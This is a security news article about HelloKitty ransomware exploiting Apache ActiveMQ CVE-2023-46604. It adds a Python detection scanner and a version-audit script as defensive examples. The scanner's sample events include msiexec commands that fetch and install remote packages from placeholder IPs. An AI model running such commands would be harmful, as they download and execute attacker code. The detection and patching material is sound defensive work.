HelloKitty Ransomware Exploiting Apache ActiveMQ Flaw

The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries on target systems and demand a ransom from the victim organizations.

Based on the evidence and the ransom note, Rapid7 experts have linked the activity to the HelloKitty ransomware family, whose source code was made public on a forum in early October.

CVE-2023-46604 is a critical severity RCE with a CVSS v3 score of 10.0. It arises from the handling of serialized class types in the OpenWire protocol and enables attackers to execute arbitrary shell commands.


“The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath,” ShadowServer reports.

Indicators of compromise were present in both of the impacted customer environments, which were running outdated Apache ActiveMQ versions.

Affected Versions

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Apache disclosed the issue and released updated ActiveMQ versions on October 25, 2023. Vulnerability details and proof-of-concept exploit code have both been made publicly available.

HelloKitty Ransomware Exploiting Apache ActiveMQ Flaw

In 2020, the ransomware program HelloKitty appeared and has since been used in other high-profile attacks.

In this case, after successful exploitation the attacker attempts to use the Windows Installer (msiexec) to load remote binaries named M2.png and M4.png.

The 32-bit .NET executable named dllloader, contained in both MSI files, loads a Base64-encoded payload called EncDLL. EncDLL behaves as ransomware: it searches for and terminates a particular set of processes before starting encryption, and appends the “.locked” extension to the encrypted files.
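The post-exploitation behaviour described above (the broker's shell access used to launch msiexec against a remote package whose name masquerades as an image) gives defenders a concrete process-creation pattern to hunt for. The following is an added example written for this article, not Rapid7's or the article's own detection logic; the log records, IP addresses and file paths are constructed, and the parent-process heuristic assumes the ActiveMQ broker runs under java.exe on the host being monitored.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-creation events (not real telemetry).
# Each record is (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Java\\jre\\bin\\java.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec /q /i http://198.51.100.10/M2.png"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec /i C:\\Users\\alice\\Downloads\\7zip.msi"),
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe",
     "svchost.exe -k netsvcs"),
    ("C:\\Program Files\\Java\\jre\\bin\\java.exe", "C:\\Windows\\System32\\cmd.exe",
     "cmd.exe /c msiexec.exe /q /i https://203.0.113.5/M4.png"),
]

# msiexec (possibly wrapped by cmd.exe) given an HTTP(S) URL as the package to install
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\s+.*?(https?://\S+)", re.IGNORECASE)
# package URL ending in an image extension, as with the M2.png / M4.png names
IMAGE_EXT = re.compile(r"\.(png|jpg|jpeg|gif|bmp)$", re.IGNORECASE)


@dataclass
class Finding:
    severity: str
    reason: str
    command_line: str


def assess_event(parent_image, image, command_line):
    """Return a Finding if the event matches the remote-MSI pattern, else None."""
    m = REMOTE_MSI.search(command_line)
    if not m:
        return None
    url = m.group(1)
    reasons = ["msiexec fetching a package over HTTP(S)"]
    severity = "medium"
    if IMAGE_EXT.search(url):
        reasons.append("package name masquerades as an image file")
        severity = "high"
    # Assumption: the broker runs under java.exe, so an installer spawned
    # (directly or via cmd.exe) by the JVM is unexpected on a broker host.
    if parent_image.lower().endswith("java.exe"):
        reasons.append("spawned by the Java (broker) process")
        severity = "high"
    return Finding(severity, "; ".join(reasons), command_line)


def scan(events):
    """Run assess_event over an iterable of (parent, image, cmdline) records."""
    return [f for f in (assess_event(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.reason}: {finding.command_line}")
```

The local install of 7zip.msi from a user's Downloads folder is deliberately not flagged: the signal is the combination of a remote package, a file name that does not look like an installer, and a parent process that has no business running installers, rather than msiexec on its own.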

Fix Released

The issue is fixed in versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3.

Mitigation

Organizations should upgrade to a fixed version of ActiveMQ as soon as feasible and examine their systems for signs of vulnerability.
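The first step in that examination is knowing which brokers in the estate fall inside the affected ranges listed above. The following inventory check is an added example written for this article (not Apache's or Rapid7's tooling); it encodes the version ranges from the advisory and the hostnames and version strings in the sample inventory are constructed.

```python
import re

# Fixed releases from the advisory; every earlier release on the same line is affected,
# and anything older than the 5.15 line falls under "before 5.15.16".
FIXED = [(5, 18, 3), (5, 17, 6), (5, 16, 7), (5, 15, 16)]


def parse_version(text):
    """Extract the first x.y.z version from a string such as 'ActiveMQ 5.17.2'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable(version):
    """True if the version falls into one of the CVE-2023-46604 affected ranges."""
    v = parse_version(version) if isinstance(version, str) else tuple(version)
    line = v[:2]
    if line > (5, 18):
        # Release lines newer than 5.18 are outside the advisory's ranges.
        return False
    for fix in FIXED:
        if line == fix[:2]:
            return v < fix
    return v < (5, 15, 16)


def recommended_fix(version):
    """The smallest fixed release on the same line (5.15.16 for anything older)."""
    v = parse_version(version) if isinstance(version, str) else tuple(version)
    for fix in FIXED:
        if v[:2] == fix[:2]:
            return fix
    return (5, 15, 16)


def audit(inventory):
    """inventory: iterable of (host, version_string).
    Returns [(host, version_string, fixed_version_string)] for hosts needing an upgrade."""
    out = []
    for host, ver in inventory:
        if is_vulnerable(ver):
            out.append((host, ver, ".".join(map(str, recommended_fix(ver)))))
    return out


# Constructed sample inventory, e.g. scraped from each broker's admin console banner.
SAMPLE_INVENTORY = [
    ("mq-prod-01.example.internal", "ActiveMQ 5.17.2"),
    ("mq-prod-02.example.internal", "ActiveMQ 5.18.3"),
    ("mq-legacy.example.internal", "ActiveMQ 5.14.5"),
    ("mq-dev.example.internal", "5.16.7"),
]

if __name__ == "__main__":
    for host, ver, fix in audit(SAMPLE_INVENTORY):
        print(f"{host}: {ver} is affected, upgrade to {fix}")
```

Feeding the function a version string from each broker (the admin console and the startup log both print one) gives a quick list of what to patch first; it does not replace checking those hosts for the msiexec and “.locked” indicators described earlier, since a patched broker may already have been exploited before the upgrade.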


Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.